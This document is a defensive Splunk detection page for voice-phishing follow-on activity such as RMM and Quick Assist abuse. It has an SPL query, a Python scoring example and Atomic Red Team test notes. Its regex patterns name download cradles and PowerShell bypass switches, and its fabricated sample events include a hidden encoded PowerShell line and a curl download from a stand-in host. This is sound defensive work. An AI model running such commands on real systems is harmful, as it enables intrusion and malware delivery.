Detect Spearphishing Voice in Splunk
Adversaries use voice communications (phone calls, VoIP) to socially engineer victims into granting system access, installing remote monitoring and management (RMM) tools, executing malicious scripts, or approving fraudulent MFA prompts. The attacker typically impersonates IT support or another trusted authority and manufactures urgency so the victim does not stop to verify. Unlike email phishing, vishing leaves no direct technical artifact of the call itself, so detection must focus on the downstream behaviors: abnormal RMM tool installation, suspicious process chains spawned during or after remote sessions, and MFA anomaly patterns. Storm-1811 is a documented threat group using this technique: posing as Microsoft or internal IT support, it directs victims to open Quick Assist (the built-in Windows remote help tool) and hand over control of the machine.
MITRE ATT&CK
- Tactic: Initial Access
- Technique: T1566 Phishing
- Sub-technique: T1566.004 Spearphishing Voice
- Canonical reference: https://attack.mitre.org/techniques/T1566/004/
SPL Detection Query
```spl
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval Image_lower=lower(Image)
| eval ParentImage_lower=lower(ParentImage)
| eval CommandLine_lower=lower(CommandLine)
| eval IsRMMParent=if(match(ParentImage_lower, "(anydesk|teamviewer|screenconnect|connectwise|quickassist|remotepc|logmeinrescue|atera|splashtop|supremo|ultraviewer|rustdesk|ammyy|getscreen|zoho_assist|msra|fixmeit|dwagent)"), 1, 0)
| eval IsRMMProcess=if(match(Image_lower, "(anydesk|teamviewer|screenconnect|connectwise|quickassist|remotepc|logmeinrescue|atera|splashtop|supremo|ultraviewer|rustdesk|ammyy|getscreen|zoho_assist|msra|fixmeit|dwagent)"), 1, 0)
| eval IsSuspiciousChild=if(IsRMMParent=1 AND match(Image_lower, "(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|msiexec|curl\.exe|wget\.exe)"), 1, 0)
| eval HasEncodedCmd=if(match(CommandLine_lower, "-e(c|nc|ncodedcommand)?\s"), 1, 0)
| eval HasDownloadCradle=if(match(CommandLine_lower, "(invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer|certutil.*urlcache)"), 1, 0)
| eval HasBypass=if(match(CommandLine_lower, "(-(ep|exec|executionpolicy)\s+bypass|iex[\s(]|invoke-expression|-w(indowstyle)?\s+hidden)"), 1, 0)
| eval IsQuickAssistParent=if(match(ParentImage_lower, "(quickassist|msra)"), 1, 0)
| eval RiskScore=IsSuspiciousChild + HasEncodedCmd + HasDownloadCradle + HasBypass + (IsQuickAssistParent * 2)
| where IsSuspiciousChild=1 OR (IsRMMProcess=1 AND (HasEncodedCmd=1 OR HasDownloadCradle=1 OR HasBypass=1)) OR IsQuickAssistParent=1
| eval DetectionType=case(
    IsQuickAssistParent=1, "QuickAssist_Child_Execution",
    IsSuspiciousChild=1, "RMM_Spawned_Suspicious_Child",
    IsRMMProcess=1, "RMM_Suspicious_Cmdline",
    true(), "Unknown")
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, DetectionType, IsSuspiciousChild, HasEncodedCmd, HasDownloadCradle, HasBypass, RiskScore
| sort -RiskScore, -_time
```

The query runs over Sysmon Event ID 1 (Process Create) and evaluates three overlapping post-vishing patterns: an RMM tool spawning an interpreter or LOLBin child, an RMM process whose own command line carries an encoded command, a download cradle or a policy bypass, and Quick Assist or msra.exe (the Storm-1811 TTP) spawning any child process at all. The encoded-command and bypass patterns accept PowerShell's short switch forms (-e/-ec/-enc, -ep/-exec, -w hidden), which an operator typing into a live session is more likely to use than the long parameter names. RiskScore weights the Quick Assist branch double because of its documented abuse. One caveat on that branch: in the Storm-1811 chain the operator types commands into the victim's session (Run dialog, cURL), so the resulting processes are children of explorer.exe or cmd.exe rather than of QuickAssist.exe. The parent match catches atomic-style tests and direct launches; for live intrusions, pair it with a per-host correlation between a QuickAssist.exe start and interpreter or LOLBin launches in the following minutes. Requires Sysmon with process creation logging that includes parent process data.
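To show how the scoring resolves on concrete records, and where the Quick Assist parent branch falls short, here is the same logic in Python run over constructed Sysmon Event ID 1 records. This is an added example, not the page's query or any vendor's code. The hosts, users, paths, the 203.0.113.10 URL and the sanctioned-agent allowlist are fabricated for illustration, and quickassist_session_children is an added time-window hunt that the SPL above does not contain.

```python
"""The page's SPL scoring re-expressed in Python and run over constructed Sysmon EID 1
records. Example code, not the page's query or any vendor's; all events are fabricated."""
import re

# Indicator families as in the SPL eval() lines; re.I stands in for the query's lower() calls.
# The encoded/bypass patterns also accept PowerShell's short switch forms (-e, -ep, -w).
RMM_RE = re.compile(
    r"anydesk|teamviewer|screenconnect|connectwise|quickassist|remotepc|logmeinrescue|atera|"
    r"splashtop|supremo|ultraviewer|rustdesk|ammyy|getscreen|zoho_assist|msra|fixmeit|dwagent", re.I)
CHILD_RE = re.compile(
    r"powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|"
    r"msiexec|curl\.exe|wget\.exe", re.I)
ENCODED_RE = re.compile(r"-e(c|nc|ncodedcommand)?\s", re.I)
CRADLE_RE = re.compile(r"invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
                       r"start-bitstransfer|certutil.*urlcache", re.I)
BYPASS_RE = re.compile(r"-(ep|exec|executionpolicy)\s+bypass|iex[\s(]|invoke-expression|"
                       r"-w(indowstyle)?\s+hidden", re.I)
QA_RE = re.compile(r"quickassist|msra", re.I)


def score_event(ev, sanctioned=frozenset()):
    """Mirror the SPL eval/where/case chain for one record.

    Returns (DetectionType, RiskScore), or None where the SPL `where` clause drops the event.
    `sanctioned` is a tuning knob the SPL lacks (an assumption of this example): (host, parent
    basename) pairs whose RMM agent may spawn plain children. A sanctioned pair is suppressed
    only when the score is 1, i.e. a bare child spawn with no encoded/cradle/bypass indicator,
    so a sanctioned agent driven by a vishing operator still alerts.
    """
    image, parent, cmd = ev["Image"], ev["ParentImage"], ev.get("CommandLine", "")
    is_rmm_parent = bool(RMM_RE.search(parent))
    is_rmm_process = bool(RMM_RE.search(image))
    suspicious_child = is_rmm_parent and bool(CHILD_RE.search(image))
    encoded, cradle, bypass = (bool(r.search(cmd)) for r in (ENCODED_RE, CRADLE_RE, BYPASS_RE))
    qa_parent = bool(QA_RE.search(parent))
    if not (suspicious_child or (is_rmm_process and (encoded or cradle or bypass)) or qa_parent):
        return None
    score = int(suspicious_child) + encoded + cradle + bypass + 2 * qa_parent
    if score == 1 and (ev["host"], parent.rsplit("\\", 1)[-1].lower()) in sanctioned:
        return None
    if qa_parent:
        kind = "QuickAssist_Child_Execution"
    elif suspicious_child:
        kind = "RMM_Spawned_Suspicious_Child"
    else:
        kind = "RMM_Suspicious_Cmdline"
    return kind, score


def run_detection(events, sanctioned=frozenset()):
    """Equivalent of the query's table/sort: alerts by RiskScore descending, then newest first."""
    rows = []
    for ev in events:
        hit = score_event(ev, sanctioned)
        if hit:
            rows.append({"_time": ev["_time"], "host": ev["host"], "Image": ev["Image"],
                         "DetectionType": hit[0], "RiskScore": hit[1]})
    return sorted(rows, key=lambda r: (-r["RiskScore"], -r["_time"]))


def quickassist_session_children(events, window_s=900):
    """Added hunt, not in the SPL. Commands an operator types into a Quick Assist session
    (Run dialog, cURL) run as children of explorer.exe or cmd.exe, not of QuickAssist.exe,
    so the parent-based branch misses them. Flag interpreter/LOLBin starts on a host within
    `window_s` seconds after QuickAssist.exe started there, regardless of parent."""
    qa_started, hits = {}, []
    for ev in sorted(events, key=lambda e: e["_time"]):
        if QA_RE.search(ev["Image"]):
            qa_started[ev["host"]] = ev["_time"]
        elif CHILD_RE.search(ev["Image"]):
            t0 = qa_started.get(ev["host"])
            if t0 is not None and 0 <= ev["_time"] - t0 <= window_s:
                hits.append((ev["host"], ev["Image"].rsplit("\\", 1)[-1], ev.get("CommandLine", "")))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
QA = r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_2.0.0.0_x64__8wekyb3d8bbwe"
SAMPLE_EVENTS = [  # constructed records; hosts, users, paths and the 203.0.113.10 URL are fabricated
    # AnyDesk session launching a hidden, encoded PowerShell loader
    {"_time": 1000, "host": "WS01", "User": "CORP\\alice", "Image": PS,
     "ParentImage": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Atomic-style test: QuickAssist.exe itself is the parent of powershell.exe
    {"_time": 1100, "host": "WS02", "User": "CORP\\bob", "Image": PS,
     "ParentImage": QA + r"\QuickAssist.exe", "CommandLine": "powershell.exe -nop -c Get-Process"},
    # Live-intrusion shape: QuickAssist.exe starts, then curl.exe arrives under explorer.exe
    {"_time": 1200, "host": "WS03", "User": "CORP\\carol", "Image": QA + r"\QuickAssist.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "QuickAssist.exe"},
    {"_time": 1500, "host": "WS03", "User": "CORP\\carol", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "curl -o C:\\Users\\Public\\update.zip http://203.0.113.10/update.zip"},
    # Sanctioned MSP agent running a plain maintenance command (tuning candidate)
    {"_time": 1600, "host": "WS04", "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "CommandLine": "cmd.exe /c wuauclt /detectnow"},
]
SANCTIONED = frozenset({("WS04", "screenconnect.clientservice.exe")})

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS, SANCTIONED):
        print(row["RiskScore"], row["DetectionType"], row["host"], row["Image"])
    for hit in quickassist_session_children(SAMPLE_EVENTS):
        print("quick assist window:", *hit)
```

Run stand-alone, the AnyDesk and Quick Assist-parent records score 3 each, the ScreenConnect record scores 1 and is suppressed by the allowlist, and the curl.exe launch on WS03 is invisible to score_event but is picked up by the time-window hunt. In SPL the same hunt is a per-host correlation (for example, streamstats by host over the most recent QuickAssist.exe start) rather than a parent-image match.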
Data Sources
- Sysmon Event ID 1 (Process Create), with Image, ParentImage, CommandLine and ParentCommandLine populated
Required Sourcetypes
- XmlWinEventLog:Microsoft-Windows-Sysmon/Operational (the query assumes index=wineventlog; adjust to your ingest)
False Positives & Tuning
- Legitimate IT helpdesk using Quick Assist or AnyDesk to run diagnostic scripts on user machines during support sessions
- MSP-deployed RMM agents (ConnectWise, Atera) that execute scripted patch deployments or configuration management tasks
- Corporate IT departments using TeamViewer for remote onboarding that involves running PowerShell configuration scripts
- Vendor remote support sessions for enterprise software (ERP, HR systems) that use their own remote access clients and run diagnostic tools
- Automated software deployment pipelines that happen to run through an RMM agent interface
Tune by allowlisting sanctioned RMM parent images per host or per managed host group, not by removing tools from the RMM pattern: a sanctioned tool is exactly what a vishing operator asks the victim to install. Keep alerting on sanctioned agents whenever the child command line also carries an encoded command, download cradle or policy bypass, since routine patching and configuration scripts rarely need those.
Testing Methodology
Validate this detection with the four Atomic Red Team tests for T1566.004 below. Each test lists the behaviour it exercises and the telemetry you should expect to see.
- Test 1: Silent AnyDesk Installation (Vishing Initial Access Simulation)
  Expected signal: Sysmon Event ID 11 (File Create): AnyDesk.exe written to %TEMP%. Sysmon Event ID 1 (Process Create): AnyDesk.exe spawned with the --portable argument, parent process PowerShell. Sysmon Event ID 3 (Network Connection): outbound connection to download.anydesk.com (185.34.32.x) on port 443 for the download, then to AnyDesk relay servers on port 7070 or 443 after launch. Windows Security Event 4688 if command line auditing is enabled.
- Test 2: Quick Assist Session Initiation with Child PowerShell (Storm-1811 TTP)
  Expected signal: Sysmon Event ID 1 (Process Create): quickassist.exe started. Sysmon Event ID 1 (Process Create): powershell.exe started with the test script's shell as parent (simulating a Quick Assist parent). The query's 'QuickAssist_Child_Execution' branch fires on any child of Quick Assist or msra.exe, PowerShell included. Microsoft-Windows-RemoteAssistance/Operational Event ID 1 logged when Quick Assist initializes.
- Test 3: Post-Vishing Script Delivery via RMM Session Simulation
  Expected signal: Sysmon Event ID 1 (Process Create): powershell.exe with -ExecutionPolicy Bypass, -WindowStyle Hidden, and Net.WebClient/DownloadString in CommandLine. Sysmon Event ID 3 (Network Connection): attempt to connect to 127.0.0.1:9999 (will fail, no listener). Sysmon Event ID 11 (File Create): vishing-stage2-test.txt written to %TEMP%. PowerShell ScriptBlock Log Event ID 4104: full deobfuscated script content captured.
- Test 4: Callback Phishing URL Pattern Execution (Luna Moth Simulation)
  Expected signal: Sysmon Event ID 1 (Process Create): cmd.exe spawning msiexec.exe with an HTTP URL argument. Sysmon Event ID 3 (Network Connection): msiexec.exe attempting an outbound HTTP connection to 127.0.0.1:9998 (will fail). Windows Security Event 4688: msiexec.exe process creation with the URL in the command line if command line auditing is enabled. msiexec launched with an HTTP URL is characteristic of vishing-directed software installation.
References (10)
- https://attack.mitre.org/techniques/T1566/004/
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/
- https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/
- https://blog.sygnia.co/luna-moth-false-subscription-scams
- https://www.cisa.gov/uscert/ncas/alerts/aa23-025a
- https://www.proofpoint.com/us/threat-reference/vishing
- https://www.redcanary.com/blog/storm-1811/
- https://www.rapid7.com/blog/post/2024/05/23/email-bombing-and-vishing-attacks-deploying-black-basta-ransomware/
- https://learn.microsoft.com/en-us/windows/security/operating-system-security/network-security/windows-firewall/quick-assist
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.004/T1566.004.md